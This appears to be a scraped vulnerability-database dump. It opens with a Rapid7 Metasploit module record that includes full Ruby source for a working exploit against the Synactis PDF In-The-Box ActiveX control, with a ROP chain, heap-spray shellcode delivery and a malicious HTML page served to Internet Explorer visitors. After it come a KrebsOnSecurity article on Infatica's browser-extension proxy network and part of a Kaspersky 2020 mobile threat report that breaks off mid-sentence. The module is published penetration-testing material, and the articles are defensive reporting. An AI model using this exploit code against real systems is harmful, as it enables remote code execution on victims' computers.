{"id": "MSF:EXPLOIT/WINDOWS/BROWSER/SYNACTIS_CONNECTTOSYNACTIS_BOF", "type": "metasploit", "bulletinFamily": "exploit", "title": "Synactis PDF In-The-Box ConnectToSynactic Stack Buffer Overflow", "description": "This module exploits a vulnerability found in Synactis' PDF In-The-Box ActiveX component, specifically PDF_IN_1.ocx. When a long string of data is given to the ConnectToSynactis function, which is meant to be used for the ldCmdLine argument of a WinExec call, a strcpy routine can end up overwriting a TRegistry class pointer saved on the stack, resulting in arbitrary code execution under the context of the user. Also note that since the WinExec function is used to call the default browser, you must be aware that: 1) The default must be Internet Explorer, and 2) when the exploit runs, another browser will pop up. Synactis PDF In-The-Box is also used by other software such as Logic Print 2013, which is how the vulnerability was found and publicly disclosed.\n", "published": "2013-06-07T01:05:08", "modified": "2020-10-02T20:00:37", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2020-10-12T22:50:11", "viewCount": 22, "enchantments": {"score": {"value": 4.7, "vector": "NONE", "modified": "2020-10-12T22:50:11", "rev": 2}, "dependencies": {"references": [{"type": "threatpost", "idList": ["THREATPOST:7B2EAFA107D335014D553D78946C453E", "THREATPOST:CD0C6BFC2A71E723ABC80C9F2924375E"]}, {"type": "securelist", "idList": ["SECURELIST:B60BDBDD8BD41CE722ECD2F07BB00D34"]}, {"type": "thn", "idList": ["THN:DAE548E4C591A2718BC3A3D2C9440FB1"]}, {"type": "pentestpartners", "idList": ["PENTESTPARTNERS:2E2A4B3CF204DCA81F5AA3AC47CF9604"]}, {"type": "suse", "idList": ["OPENSUSE-SU-2020:1834-1", "OPENSUSE-SU-2020:1831-1"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:159923", "PACKETSTORM:159922", "PACKETSTORM:159930"]}, {"type": "exploitdb", "idList": ["EDB-ID:48999", "EDB-ID:48996"]}, {"type": "kitploit", "idList": ["KITPLOIT:7502592055175491881"]}, {"type": "hackread", "idList": ["HACKREAD:90806867A52B2AFC51E6A46C6C15553B"]}, {"type": "cve", "idList": ["CVE-2020-13661", "CVE-2020-5793", "CVE-2020-6015", "CVE-2020-14240"]}, {"type": "tenable", "idList": ["TENABLE:74AABB2A27AB230BE00C5C4318B367BE"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:41A341FC7700914F2AB1EF95F5934698"]}], "modified": "2020-10-12T22:50:11", "rev": 2}, "vulnersScore": 4.7}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/windows/browser/synactis_connecttosynactis_bof.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = NormalRanking\n\n include Msf::Exploit::Remote::HttpServer::HTML\n include Msf::Exploit::RopDb\n #include Msf::Exploit::Remote::BrowserAutopwn\n #\n #autopwn_info({\n # :ua_name => HttpClients::IE,\n # :ua_minver => \"7.0\",\n # :ua_maxver => \"8.0\",\n # :javascript => true,\n # :classid => \"{C80CAF1F-C58E-11D5-A093-006097ED77E6}\",\n # :method => \"ConnectToSynactis\",\n # :os_name => OperatingSystems::Match::WINDOWS,\n # :rank => AverageRanking\n #})\n\n def initialize(info={})\n super(update_info(info,\n 'Name' => \"Synactis PDF In-The-Box ConnectToSynactic Stack Buffer Overflow\",\n 'Description' => %q{\n This module exploits a vulnerability found in Synactis' PDF In-The-Box ActiveX\n component, specifically PDF_IN_1.ocx. When a long string of data is given\n to the ConnectToSynactis function, which is meant to be used for the ldCmdLine\n argument of a WinExec call, a strcpy routine can end up overwriting a TRegistry\n class pointer saved on the stack, resulting in arbitrary code execution under the\n context of the user.\n\n Also note that since the WinExec function is used to call the default browser,\n you must be aware that: 1) The default must be Internet Explorer, and 2) when the\n exploit runs, another browser will pop up.\n\n Synactis PDF In-The-Box is also used by other software such as Logic Print 2013,\n which is how the vulnerability was found and publicly disclosed.\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'h1ch4m',\n 'sinn3r' #Metasploit\n ],\n 'References' =>\n [\n [ 'OSVDB', '93754' ],\n [ 'EDB', '25835' ]\n ],\n 'Platform' => 'win',\n 'Targets' =>\n [\n # Newer setups like Win + IE8: \"Object doesn't support this property or method\"\n [ 'Automatic', {} ],\n [\n 'IE 7 on Windows XP SP3', {'Eax' => 0x0c0c0c0c}\n ],\n [\n # 0x20302020 = Where the heap spray will land\n # 0x77c15ed5 = xchg eax,esp; rcr dword ptr [esi-75], 0c1h, pop ebp; ret 4\n 'IE 8 on Windows XP SP3',\n { 'Rop' => :msvcrt, 'Pivot' => 0x77C218D3, 'Ecx' => 0x20302024, 'Eax' => 0x20302028 }\n ]\n ],\n 'Payload' =>\n {\n 'BadChars' => \"\\x00\",\n 'StackAdjustment' => -3500\n },\n 'DefaultOptions' =>\n {\n 'InitialAutoRunScript' => 'post/windows/manage/priv_migrate'\n },\n 'Privileged' => false,\n 'DisclosureDate' => '2013-05-30',\n 'DefaultTarget' => 0))\n end\n\n def get_target(agent)\n return target if target.name != 'Automatic'\n\n nt = agent.scan(/Windows NT (\\d\\.\\d)/).flatten[0] || ''\n ie = agent.scan(/MSIE (\\d)/).flatten[0] || ''\n\n ie_name = \"IE #{ie}\"\n\n case nt\n when '5.1'\n os_name = 'Windows XP SP3'\n end\n\n targets.each do |t|\n if (!ie.empty? and t.name.include?(ie_name)) and (!nt.empty? and t.name.include?(os_name))\n return t\n end\n end\n\n return nil\n end\n\n def get_payload(t, cli)\n code = payload.encoded\n\n case t['Rop']\n when :msvcrt\n print_status(\"Using msvcrt ROP\")\n align = \"\\x81\\xc4\\x54\\xf2\\xff\\xff\" # Stack adjustment # add esp, -3500\n # Must be null-byte-free for the spray\n chain =\n [\n t['Pivot'],\n 0x41414141,\n t['Ecx'], # To ECX\n 0x77c1e844, # POP EBP # RETN [msvcrt.dll]\n 0x41414141,\n 0x77c1e844, # skip 4 bytes [msvcrt.dll]\n 0x77c4fa1c, # POP EBX # RETN [msvcrt.dll]\n 0xffffffff,\n 0x77c127e5, # INC EBX # RETN [msvcrt.dll]\n 0x77c127e5, # INC EBX # RETN [msvcrt.dll]\n 0x77c4e0da, # POP EAX # RETN [msvcrt.dll]\n 0x2cfe1467, # put delta into eax (-> put 0x00001000 into edx)\n 0x77c4eb80, # ADD EAX,75C13B66 # ADD EAX,5D40C033 # RETN [msvcrt.dll]\n 0x77c58fbc, # XCHG EAX,EDX # RETN [msvcrt.dll]\n 0x77c34fcd, # POP EAX # RETN [msvcrt.dll]\n 0x2cfe04a7, # put delta into eax (-> put 0x00000040 into ecx)\n 0x77c4eb80, # ADD EAX,75C13B66 # ADD EAX,5D40C033 # RETN [msvcrt.dll]\n 0x77c14001, # XCHG EAX,ECX # RETN [msvcrt.dll]\n 0x77c3048a, # POP EDI # RETN [msvcrt.dll]\n 0x77c47a42, # RETN (ROP NOP) [msvcrt.dll]\n 0x77c46efb, # POP ESI # RETN [msvcrt.dll]\n 0x77c2aacc, # JMP [EAX] [msvcrt.dll]\n 0x77c3b860, # POP EAX # RETN [msvcrt.dll]\n 0x77c1110c, # ptr to &VirtualAlloc() [IAT msvcrt.dll]\n 0x77c12df9, # PUSHAD # RETN [msvcrt.dll]\n 0x77c35459 # ptr to 'push esp # ret ' [msvcrt.dll]\n ].pack(\"V*\")\n\n p = chain + align + code\n\n else\n p = \"\\x0c\" * 50 + code\n end\n\n p\n end\n\n def get_html(cli, req, target)\n js_p = ::Rex::Text.to_unescape(get_payload(target, cli), ::Rex::Arch.endian(target.arch))\n eax = \"\\\\x\" + [target['Eax']].pack(\"V*\").unpack(\"H*\")[0].scan(/../) * \"\\\\x\"\n\n html = %Q|\n <html>\n <head>\n <script>\n #{js_property_spray}\n\n function r()\n {\n var s = unescape(\"#{js_p}\");\n sprayHeap({shellcode:s});\n\n var p1 = '';\n var p2 = '';\n eax = \"#{eax}\";\n\n while (p1.length < 189) p1 += \"\\\\x0c\";\n while (p2.length < 7000) p2 += \"\\\\x0c\";\n\n var obj = document.getElementById(\"obj\");\n obj.ConnectToSynactis(p1+eax+p2);\n }\n </script>\n </head>\n <body OnLoad=\"r();\">\n <OBJECT classid=\"clsid:C80CAF1F-C58E-11D5-A093-006097ED77E6\" id=\"obj\"></OBJECT>\n </body>\n </html>\n |\n\n html.gsub(/^ {4}/, '')\n end\n\n def on_request_uri(cli, request)\n agent = request.headers['User-Agent']\n uri = request.uri\n print_status(\"Requesting: #{uri}\")\n\n target = get_target(agent)\n if target.nil?\n print_error(\"Browser not supported, sending 404: #{agent}\")\n send_not_found(cli)\n return\n end\n\n print_status(\"Target selected as: #{target.name}\")\n send_response(cli, get_html(cli, request, target), {'Content-Type'=>'text/html', 'Cache-Control'=>'no-cache'})\n end\nend\n", "metasploitReliability": "", "metasploitHistory": ""}

{"krebs": [{"lastseen": "2021-03-01T18:27:09", "bulletinFamily": "blog", "cvelist": [], "description": "A company that rents out access to more than 10 million Web browsers so that clients can hide their true Internet addresses has built its network by paying browser extension makers to quietly include its code in their creations. This story examines the lopsided economics of extension development, and why installing an extension can be such a risky proposition.\n\n\n\nSingapore-based **Infatica[.]io** is part of a growing industry of shadowy firms trying to woo developers who maintain popular browser extensions -- desktop and mobile device software add-ons available for download from **Apple**, **Google**, **Microsoft** and **Mozilla** designed to add functionality or customization to one&#x27;s browsing experience.\n\nSome of these extensions have garnered hundreds of thousands or even millions of users. But here&#x27;s the rub: As an extension&#x27;s user base grows, maintaining them with software updates and responding to user support requests tends to take up an inordinate amount of the author&#x27;s time. Yet extension authors have few options for earning financial compensation for their work.\n\nSo when a company comes along and offers to buy the extension -- or pay the author to silently include some extra code -- that proposal is frequently too good to pass up.\n\nFor its part, Infatica seeks out authors with extensions that have at least 50,000 users. An extension maker who agrees to incorporate Infatica&#x27;s computer code can earn anywhere from $15 to $45 each month for every 1,000 active users.\n\n\n\nAn Infatica graphic explaining the potential benefits for extension owners.\n\nInfatica&#x27;s code then uses the browser of anyone who has that extension installed to route Web traffic for the company&#x27;s customers, including marketers or anyone able to afford its hefty monthly subscription charges.\n\nThe end result is when Infatica customers browse to a web site, that site thinks the traffic is coming from the Internet address tied to the extension user, not the customer&#x27;s.\n\nInfatica prices its service based on the volume of web traffic a customer is seeking to anonymize, from $360 a month for 40 gigabytes all the way to $20,000 a month for 10,000 gigabytes of data traffic pushed through millions of residential computers.\n\n#### THE ECONOMICS OF EXTENSIONS\n\n**Hao Nguyen** is the developer behind [ModHeader](<https://chrome.google.com/webstore/detail/modheader/idgpnmonknjnojddfkpgkljpfnnfcklj?hl=en>), an extension used by more than 400,000 people to test the functionality of websites by making it easier for users to modify the data shared with those sites. When Nguyen found himself spending increasing amounts of his time and money supporting the extension, he tried including ads in the program to help offset costs.\n\nModHeader users protested loudly against the change, and Nguyen removed the ads -- which he said weren&#x27;t making him much money anyway.\n\n&quot;I had spent at least 10 years building this thing and had no luck monetizing it,&quot; he told KrebsOnSecurity.\n\nNguyen said he ignored multiple requests from different companies offering to pay him to insert their code, mainly because the code gave those firms the ability to inject whatever they wanted into his program (and onto his users&#x27; devices) at any time.\n\nThen came Infatica, whose code was fairly straightforward by comparison, he said. It restricted the company to routing web requests through his users&#x27; browsers, and did not try to access more sensitive components of the user&#x27;s browser experience, such as stored passwords and cookies, or viewing the user&#x27;s screen.\n\nMore importantly, the deal would net him at least $1,500 a month, and possibly quite a bit more.\n\n&quot;I gave Infatica a try but within a few days I got [a lot of negative user reviews](<https://github.com/bewisse/modheader/issues/64>),&quot; he said. &quot;They didn&#x27;t like that the extension might be using their browser as a proxy for going to not so good places like porn sites.&quot;\n\nAgain he relented, and removed the Infatica code.\n\n#### A TARGET-RICH ENVIRONMENT\n\nThese days, Nguyen is focusing more of his time on [chrome-stats.com](<https://www.chrome-stats.com>), which provides detailed information on more than 150,000 extensions. The service is free for limited use, but subscribers who pay a monthly fee can get access to more resources, such as older extension versions and details about their code components.\n\nAccording to chrome-stats.com, the majority of extensions -- more than 100,000 of them -- are effectively abandoned by their authors, or haven&#x27;t been updated in more than two years. In other words, there a great many developers who are likely to be open to someone else buying up their creation and their user base.\n\n[](<https://krebsonsecurity.com/wp-content/uploads/2021/02/chromeext-updates.png>)\n\nImage: chrome-stats.com\n\nThe vast majority of extensions are free, although a handful that have attracted a large and loyal enough following have been able to charge for their creations or for subscription services tied to the extension. But last year, Google announced it was [shutting down paid Chrome extensions offered on its Chrome Web Store](<https://www.theverge.com/2020/9/22/21451111/google-paid-chrome-extension-monetize-shut-down-end>).\n\nNguyen said this will only exacerbate the problem of frustrated developers turning to offers from dodgy marketing firms.\n\n&quot;It&#x27;s a really tough marketplace for extension developers to be able to monetize and get reward for maintaining their extensions,&quot; he said. &quot;There are tons of small developers who haven&#x27;t been able to do anything with their extensions. That&#x27;s why some of them will go into shady integration or sell the extension for some money and just be done with it.&quot;\n\n[](<https://krebsonsecurity.com/wp-content/uploads/2021/02/hola-luminati.png>)\n\nA solicitation sent by Infatica to the developer of the SponsorBlock extension. Image: sponsor.ajay.app\n\n#### WHO IS INFATICA?\n\nIt is unclear how many extensions currently incorporate Infatica&#x27;s code. KrebsOnSecurity searched for extensions that invoke several domains tied to Infatica&#x27;s Web proxy service (e.g., **extendbalanc[.]org**, **ipv4v6[.]info**). This research was conducted using Nguyen&#x27;s site and [crxcavator.io](<https://crxcavator.io>), a similar extension research site owned by networking giant **Cisco Systems**.\n\nThose searches revealed that Infatica&#x27;s code has been associated with at least three dozen extensions over the past few years, including several that had more than 100,000 users. One of those is Video Downloader Plus, which at one point claimed nearly 1.4 million active users.\n\nThe founder and director of Infatica -- a resident of Biysk, Russia named **Vladimir Fomenko** -- did not respond to multiple requests for comment.\n\n\n\nInfatica founder Vladimir M. Fomenko.\n\nFomenko is the sole director of the [iNinja VPN](<https://www.thetimes.co.uk/article/kompromat-fears-over-vladimir-fomenkos-web-service-t7tqdrvcb>), another service that obfuscates the true Internet address of its more than 400,000 users. It stands to reason that iNinja VPN also is not only offering its customers a way to obfuscate their Internet address, but is actively using those same systems to route traffic for other customers: A Chrome browser plugin and ad blocker by the same name whose code includes Infatica&#x27;s &quot;extenbalanc&quot; domain has 400,000 users.\n\nThat would put Infatica in line with the activities of another major controversial VPN/proxy provider: **Illuminati**, a.k.a. &quot;**HolaVPN**.&quot; In 2015, security researchers [discovered](<http://adios-hola.org/>) that users of the HolaVPN browser extension were being used to funnel Web traffic for other people. Indeed, in the screenshot above, Infatica&#x27;s marketing team can be seen comparing its business model to that of HolaVPN.\n\nFomenko has appeared in [two previous KrebsOnSecurity stories](<https://krebsonsecurity.com/?s=vladimir+fomenko&x=0&y=0>); both concerned **King Servers** (a.k.a. &quot;**Hosting Solution Ltd.**&quot;), a hosting company he has operated for years which caters mostly to adult websites.\n\nIn 2016, hackers suspected of working for Russian state security services [compromised databases for election systems in Arizona and Illinois](<https://edition.cnn.com/2016/08/29/politics/hackers-breach-illinois-arizona-election-systems/>). Six of the eight Internet addresses [identified by the FBI](<https://s.yimg.com/dh/ap/politics/images/boe_flash_aug_2016_final.pdf>) as sources of the attack traced back to King Servers. In [an interview](<https://www.nytimes.com/2016/09/28/world/europe/russia-hacker-vladimir-fomenko-king-servers.html>) with _The New York Times_ several months later, Fomenko flatly denied having any ties to the hacking.\n\nAccording to the Russian daily [_Novaya Gazeta_](<https://translate.google.com/translate?sl=ru&tl=en&u=https://novayagazeta.ru/articles/2017/01/26/71296-troyanskiy-kod>), revelations about the 2016 hacking incident&#x27;s ties to King Servers [led to treason charges](<https://krebsonsecurity.com/2017/01/a-shakeup-in-russias-top-cybercrime-unit/>) against **Sergey Mikhaylov**, the former deputy chief of Russia&#x27;s top anti-cybercrime unit.\n\nRussian authorities charged that Mikhaylov had tipped off the FBI to information about Fomenko and King Servers. In 2019, Mikhaylov was convicted and [sentenced to 22 years in a penal colony](<https://krebsonsecurity.com/2019/02/former-russian-cybersecurity-chief-sentenced-to-22-years-in-prison/>).\n\n#### BE SPARING IN TRUSTING EXTENSIONS\n\nBrowser extensions \u2014 however useful or fun they may seem when you install them \u2014 typically have a great deal of power and can effectively read and/or write all data in your browsing sessions. The powers granted to each extension are roughly spelled out in its &quot;manifest,&quot; basically a description of what it will be able to access once you incorporate it into your browser.\n\nAccording to Nguyen&#x27;s chrome-stats.com, about a third of all extensions for Chrome -- by far the most widely-used Web browser -- require no special permissions. But the remainder require the user to place a good deal of trust in the extension&#x27;s author. For example, approximately 30 percent can view all of your data on all or specific websites, or index your open tabs and browsing activity.\n\n[](<https://krebsonsecurity.com/wp-content/uploads/2021/02/chromext-permissions.png>)\n\nImage: chrome-stats.com\n\nMore than 68,000 Chrome extensions allow the execution of arbitrary code in the context of webpages, effectively allowing the extension to alter the appearance and functionality of specific sites.\n\nI hope it\u2019s obvious by this point, but readers should be extremely cautious about installing extensions \u2014 sticking mainly to those that are actively supported and respond to user concerns.\n\nPersonally, I do not make much use of browser extensions. In almost every case I\u2019ve considered installing one I\u2019ve been sufficiently spooked by the permissions requested that I ultimately decided it wasn\u2019t worth the risk, given that any extension can go rogue at the whims of its author.\n\nIf you\u2019re the type of person who uses multiple extensions, it may be wise to adopt a risk-based approach going forward. Given the high stakes that typically come with installing an extension, consider carefully whether having the extension is truly worth it. This applies equally to plug-ins designed for Web site content management systems like **WordPress** and** Joomla**.\n\nDo not agree to update an extension if it suddenly requests more permissions than a previous version. This should be a giant red flag that something is not right. If this happens with an extension you trust, you\u2019d be well advised to remove it entirely.\n\nAlso, never download and install an extension just because some Web site says you need it to view some type of content. Doing so is almost always a high-risk proposition. Here, Rule #1 from [KrebsOnSecurity\u2019s Three Rules of Online Safety](<https://krebsonsecurity.com/2011/05/krebss-3-basic-rules-for-online-safety/>) comes into play: \u201cIf you didn\u2019t go looking for it, don\u2019t install it.\u201d Finally, in the event you do wish to install something, make sure you\u2019re getting it directly from the entity that produced the software.\n\nGoogle Chrome users can see any extensions they have installed by clicking the three dots to the right of the address bar, selecting \u201cMore tools\u201d in the resulting drop-down menu, then \u201cExtensions.\u201d In Firefox, click the three horizontal bars next to the address bar and select \u201cAdd-ons,\u201d then click the \u201cExtensions\u201d link on the resulting page to view any installed extensions.", "modified": "2021-03-01T17:22:35", "published": "2021-03-01T17:22:35", "id": "KREBS:FC02DE3210F644EBBE06FE9EBFD81A45", "href": "https://krebsonsecurity.com/2021/03/is-your-browser-extension-a-botnet-backdoor/", "type": "krebs", "title": "Is Your Browser Extension a Botnet Backdoor?", "cvss": {"score": 0.0, "vector": "NONE"}}], "securelist": [{"lastseen": "2021-03-01T14:31:28", "bulletinFamily": "blog", "cvelist": [], "description": "\n\n_These statistics are based on detection verdicts of Kaspersky products received from users who consented to providing statistical data._\n\n## The year in figures\n\nIn 2020, Kaspersky mobile products and technologies detected:\n\n * 5,683,694 malicious installation packages,\n * 156,710 new mobile banking Trojans,\n * 20,708 new mobile ransomware Trojans.\n\n## Trends of the year\n\nIn their campaigns to infect mobile devices, cybercriminals always resort to social engineering tools, the most common of these passing a malicious application off as another, popular and desirable one. All they need to do is correctly identify the application, or at least, the type of applications, that are currently in demand. Therefore, attackers constantly monitor the situation in the world, collecting the most interesting topics for potential victims, and then use these for infection or cheating users out of their money. It just so happened that the year 2020 gave hackers a large number of powerful news topics, with the COVID-19 pandemic as the biggest of these.\n\n### Pandemic theme in mobile threats\n\nThe word &quot;covid&quot; in various combinations was typically used in the names of packages hiding spyware and banking Trojans, adware or Trojan droppers. Names we encountered included _covid.apk_, _covidMapv8.1.7.apk_, _tousanticovid.apk_, _covidMappia_v1.0.3.apk_ and _coviddetect.apk_. These apps were placed on malicious websites, hyperlinks were distributed through spam, etc.\n\nThe mobile malware Trojan-Ransom.AndroidOS.Agent.aq often hid behind another popular term, &quot;corona&quot;. Here are a few names of malicious files: ir.corona.viruss.apk, coronalocker.zip, com.coronavirus.inf.apk, coronaalert.apk, corona.apk, corona-virusapps.com.zip, com.coronavirus.map.1.1.apk, coronavirus.china.\n\nOf course, this was not limited to naming: the pandemic theme was also used in application user interfaces. For example, the GINP banking Trojan pretended to be an app that searched for COVID-19-infected individuals: the victim was coaxed into providing their bank card details under the pretext of a \u20ac0.75 fee charge.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/03/01125546/mobile_report_2020_01.png>)\n\nThe creators of another banking Trojan, Cebruser, simply named it &quot;Coronavirus&quot;, probably to echo the disturbing news coming from all over the world and to make some money along the way. As in the previous case, the attackers were after the bank card details and the owner&#x27;s personal information.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/03/01125607/mobile_report_2020_02.png>)\n\nThey came up with nothing new in terms of technique. So-called &quot;web injectors&quot;, which had been perfected for years, were used in both cases. When certain events are detected, the banking Trojan opens a window that displays a web page with a request for bank card details. The page can have any type of design: we have seen a request from a large bank in one case and a message about a search for COVID-19-infected individuals in another. The flexibility allows attackers to efficiently manipulate potential victims, adapting attacks to the situation both on a particular device and in the world at large.\n\nWe could conclude that the pandemic as a global phenomenon had a major effect on the mobile threat landscape, but to be true to facts, this is not entirely the case. If you look at the dynamics of attacks on mobile users in 2020, you will see that the average monthly number of attacks decreased by 865,000 compared to 2019. That number seems large, but it is only about 1.07% of total attacks, so we cannot call it a significant decrease.\n\n_Number of attacks on mobile users in 2019 and 2020 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/03/01124715/01-en-mobile-report-2020.png>))_\n\nBesides, we have seen a decrease in attacks in the first half of 2020, which can be attributed to the confusion of the first months of the pandemic: hackers had other things to worry about. However, in the second half of the year, when the situation became calmer and more predictable despite lockdowns in a number of countries, we saw a clear increase in attacks.\n\nIn addition, our telemetry has shown significant growth in mobile financial threats in 2020. More on that later.\n\n### Adware\n\nLast year was notable for both malware and adware, the two very close in terms of capabilities. Typically, code that runs ads was embedded in a carrier application, e.g. a mobile game or torch, as long as it was popular enough. After the application ran, it could follow one of several scenarios, depending on its creator&#x27;s greed and the advertising module&#x27;s capabilities. If the user was lucky, they saw an advertising banner at the bottom of the carrier application window, and if not, the advertising module subscribed to USER_PRESENT (device unlock) events, using a SYSTEM_ALERT_WINDOW window for displaying full-screen banners at random intervals.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/03/01125652/mobile_report_2020_03.png>) \n**_Ad window (left) and carrier app definition (right)_**\n\nIn the latter case, the problem was not just the size of the banner, but also difficulty identifying the application that it was coming from. There were usually no technical obstacles to removing this application, and with it, the ads. We had recorded apps featuring aggressive advertising appearing in Google Play before, but 2020 proved rich in this kind of [cases](<https://securelist.com/in-app-advertising-in-android/97065/>).\n\nIn terms of the number of attacks on mobile users, the situation around various advertising modules and applications looked more or less stable. This is probably one of the few classes of threats where the number of attacks hardly changed in 2020 as compared to the previous year.\n\n_Number of adware attacks on mobile users in 2019 and 2020 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/03/01124742/02-en-mobile-report-2020.png>))_\n\nThe number of unique users attacked by adware decreased slightly compared to 2019.\n\n_Users attacked by adware in 2018 through 2020 ([download](<https://khub-media.s3.eu-west-1.amazonaws.com/wp-content/uploads/sites/58/2021/02/26182406/03-en-ru-es-mobile-report-2020.png>))_\n\nInterestingly enough, the share of adware attacks increased in relation to mobile malware in general. Whereas it was 12.85% in 2019, it reached 14.62% in 2020.\n\n_Distribution of attacks by type of software used in 2020 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/03/01124850/04-en-mobile-report-2020.png>))_\n\nAdware creators are interested in obstructing the removal of their products from a mobile device. They typically work with malware developers to achieve this. An example of a partnership like that is the use of various trojan botnets: we saw a number of [these cases](<https://securelist.com/pig-in-a-poke-smartphone-adware/97607/>) in 2020.\n\nThe pattern is quite simple. The bot infects a mobile device and waits for a command, usually trying to avoid the victim&#x27;s attention. As soon as the owners of the botnet and their customers come to an agreement, the bot receives a command to download, install and run a payload, in this case, adware. If the victim is annoyed by the unsolicited advertising and removes the source, the bot will simply repeat the steps. In addition, trojans have been known to elevate access privileges on the device, placing adware in the system area and making the user unable to remove them without outside help.\n\nAnother example of the partnership is so-called preinstall. The manufacturer of the mobile device preloads an adware application or a component with the firmware. As a result, the device hits the shelves already infected. This is not a [supply chain attack](<https://encyclopedia.kaspersky.com/glossary/supply-chain/?utm_source=securelist&utm_medium=blog&utm_campaign=termin-explanation>), but a premeditated step on the part of the manufacturer for which it receives extra profits. To add to that, no security solution is yet capable of reading an OS system partition to check if the device is infected. Even if detection is successful, the user is left alone with the threat, without a possibility of removing the malware quickly or easily, as Android system partitions are write protected. This vector of spreading persistent threats is likely to become increasingly popular in the absence of new effective exploits for popular Android versions.\n\n### Attacks on personal data\n\nAlmost any of the personal data stored on our smartphones can be monetized. In particular, advertisers can display targeted offerings, and attackers can access accounts with various services, such as online banking. It is thus small wonder that data is hunted: sometimes openly and sometimes illegally.\n\nEver since Android has introduced Accessibility Services, which provide applications with access to settings and other programs, the number of malware tools that extract confidential data from mobile devices has been on the rise. The Trojan [Ghimob](<https://securelist.com/ghimob-tetrade-threat-mobile-devices/99228/>) was one of 2020&#x27;s most exciting discoveries. It stole credentials for various financial systems including online banking applications and cryptocurrency wallets in Brazil. Ghimob used Accessibility for both extracting valuable data from application windows and interacting with the operating system. Whenever the user tried to access the Ghimob removal menu, the Trojan immediately opened the home screen to protect itself from being uninstalled.\n\nAnother exciting discovery was the [Cookiethief](<https://securelist.com/cookiethief/96332/>) Trojan. As the name implies, the malware targeted cookies, which store unique identifiers of web sessions and hence can be used for authorization. For example, an attacker could log in to a victim&#x27;s Facebook account and post a phishing link or spread spam. Typically, cookies on a mobile device are stored in a secure location and are inaccessible to applications, even malicious ones. To circumvent the restriction, Cookiethief tried to get root privileges on the device with the help of an exploit, before it began its malicious activities.\n\n### Apple iOS\n\nAccording to various sources, the proportion of Android-powered devices in relation to all mobile devices ranges from 50% to 85% depending on the region. Apple&#x27;s iOS naturally comes second. So, what were the threats to that system in 2020? According to the [Zerodium](<https://zerodium.com/program.html>), exchange, the price of an iOS exploit chain is quite impressive, albeit lower than that for Android: $2,000,000 against $2,500,000. We are not aware of the Zerodium pricing mechanics, but the information suggests that attacks on Apple devices are a very popular commodity. Effective infection is only feasible though a [drive-by download](<https://encyclopedia.kaspersky.com/glossary/drive-by-attack/?utm_source=securelist&utm_medium=blog&utm_campaign=termin-explanation>).\n\nIn 2020, our colleagues at TrendMicro detected the use of Apple WebKit exploits for remote code execution (RCE) in conjunction with Local Privilege Escalation exploits to deliver malware to an iOS device. The payload was the [LightSpy](<https://securelist.com/ios-exploit-chain-deploys-lightspy-malware/96407/>) Trojan whose objective was to extract personal information from a mobile device, including correspondence from instant messaging apps and browser data, take screenshots, and compile a list of nearby Wi-Fi networks. The Trojan was a modular design, with its individual components receiving updates. One of the modules discovered was a network scanner that collected information about nearby devices including their MAC addresses and manufacturer names. TrendMicro said LightSpy distribution took advantage of news portals, such as COVID-19 update sites.\n\n## Statistics\n\n### Number of installation packages\n\nWe discovered 5,683,694 mobile malicious installation packages in 2020, which was 2,100,000 more than in 2019.\n\n_Mobile malicious installation packages for Android in 2017 through 2020 ([download](<https://khub-media.s3.eu-west-1.amazonaws.com/wp-content/uploads/sites/58/2021/02/26182504/05-en-ru-es-mobile-report-2020.png>))_\n\nThe year 2020 can be said to have broken an established downward trend in the number of mobile threats discovered. There were not any special factors driving that, though.\n\n### Number of mobile users attacked\n\n_Mobile users attacked in 2019 and 2020 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/03/01125009/06-en-mobile-report-2020.png>))_\n\nThe number of users attacked steadily decreased over the past year. The number of users encountering mobile threats in 2020 was on the average a quarter lower than that in 2019.\n\n_Geography of mobile threats in 2020 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/03/01125037/07-en-mobile-report-2020.png>))_\n\n**Top 10 countries by share of users attacked by mobile malware**\n\n**Country*** | **%**** \n---|--- \nIran | 67.78 \nAlgeria | 31.29 \nBangladesh | 26.18 \nMorocco | 22.67 \nNigeria | 22.00 \nSaudi Arabia | 21.75 \nIndia | 20.69 \nMalaysia | 19.68 \nKenya | 18.52 \nIndonesia | 17.88 \n \n_* Excluded from the rankings are countries with fewer than 25,000 active users of Kaspersky mobile security solutions in the reporting period._ \n_** Users attacked in the country as a percentage of all users of Kaspersky Security for Mobile in the country._\n\nIran (67.78%) led by number of attacked users, mainly due to an aggressive spread of the AdWare.AndroidOS.Notifyer family. An alternative Telegram client, which we detect as RiskTool.AndroidOS.FakGram.d, acted as another widespread threat. This is not malware per se, but messages sent though the app can go to unintended recipients. A frequently detected malicious program was Trojan.AndroidOS.Hiddapp.bn whose objective was to download adware to an infected device.\n\nAlgeria ranked second with 31.29%. The AdWare.AndroidOS.FakeAdBlocker and AdWare.AndroidOS.HiddenAd families were the most widespread ones in that country. Two of the most widespread malicious programs were [Trojan-Dropper.AndroidOS.Agent.ok](<https://threats.kaspersky.com/en/threat/Trojan-Dropper.AndroidOS.Agent/>) and [Trojan.AndroidOS.Agent.sr](<https://threats.kaspersky.com/en/threat/Trojan.AndroidOS.Agent/>).\n\nRounding out the &quot;top three&quot; was Bangladesh with 26.18%, where the FakeAdBlocker and HiddenAd adware families were also the most widespread ones.\n\n### Types of mobile threats\n\n_Distribution of new mobile threats by type in 2019 and 2020 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/03/01125107/08-en-mobile-report-2020.png>))_\n\nTwelve of twenty-two types of mobile threats showed an increase in the number of detected installation packages in 2020, with the most significant growth demonstrated by adware: from 21.81% to 57.26%. In absolute terms, the number of packages more than quadrupled: 